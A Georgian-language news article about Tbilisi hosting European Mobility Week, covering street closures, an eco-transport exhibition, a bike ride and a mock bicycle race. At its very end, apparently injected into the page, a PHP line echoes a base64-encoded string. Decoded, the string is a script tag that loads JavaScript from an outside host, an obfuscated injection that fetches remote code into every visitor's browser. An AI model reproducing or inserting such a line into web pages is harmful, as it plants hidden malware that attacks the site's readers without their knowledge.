celsiusi
ავერსი შნაიდერი

 დედაქალაქი 16-22 სექტემბერს „ევროპის მობილობის კვირეულს“ უმასპინძლებს, რომელსაც თბილისი მესამედ უერთდება.

წლევანდელი კვირეულის თემაა „დაზოგე ენერგია“, ხოლო ღონისძიების მიზანი სხვადასხვა აქტივობის საშუალებით, მდგრადი ურბანული მობილობის შესახებ ცნობიერების ამაღლება, საზოგადოებრივი ტრანსპორტით, ფეხითა და ველოსიპედით გადაადგილების წახალისებაა. „ევროპის მობილობის კვირეულის“ ფარგლებში, თბილისის მერიის ტრანსპორტისა და ურბანული განვითარების სააგენტო პარტნიორ კომპანიებთან და ორგანიზაციებთან ერთად, სხვადასხვა აქტივობას გეგმავს.

16-17 სექტემბერს, 11:00 საათიდან ვაშლოვანის ქუჩაზე გადაადგილება ქვეითებისთვის და არამოტორიზებული ტრანსპორტისთვის იქნება დასაშვები, ხოლო 16 სექტემბრის 12:00 საათიდან 17 სექტემბრის 18:00 საათამდე, მიცკევიჩის ქუჩაზე – პეკინის გამზირიდან გამრეკელის ქუჩის კვეთამდე არსებულ საგზაო მონაკვეთში მხოლოდ ფეხითმოსიარულეები იმოძრავებენ. გარდა ამისა, 16 სექტემბერს, მიცკევიჩის ქუჩაზე – პეკინის გამზირიდან გამრეკილის ქუჩის კვეთამდე არსებულ გზის მონაკვეთში გაიმართება გამოფენა, სადაც დაინტერესებული პირები დაათვალიერებენ და გამოცდიან ეკო-მეგობრულ სატრანსპორტო საშუალებებს, ხოლო 14:00 საათზე იგეგმება „მწვანე აქცია“ და ფილმის ჩვენება.

ამავე დღეს, მსურველებს შესაძლებლობა ექნებათ, 13:00-დან 14:00 საათამდე პერიოდში ესტუმრონ დიდ დიღომში არსებულ ავტობაზას, 19:00 საათზე კი სასტუმრო „რედისონის“ მიმდებარე ტერიტორიიდან მელიქიშვილისა და პეკინის გამზირების მიმართულებით ველომსვლელობა დაიწყება. რაც შეეხება 17 სექტემბერს დაგეგმილ ღონისძიებას, 12:00-დან 18:00 საათამდე მიცკევიჩის ქუჩაზე – პეკინის გამზირიდან გამრეკილის ქუჩის კვეთამდე არსებულ საგზაო მონაკვეთში, შინაგან საქმეთა სამინისტროს მომსახურების სააგენტოს ორგანიზებით, იმიტირებული ველორბოლა ჩატარდება. ღონისძიების მონაწილეებს სიმბოლურად, ველოსიპედის მართვის მოწმობები გადაეცემათ.

 
398
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");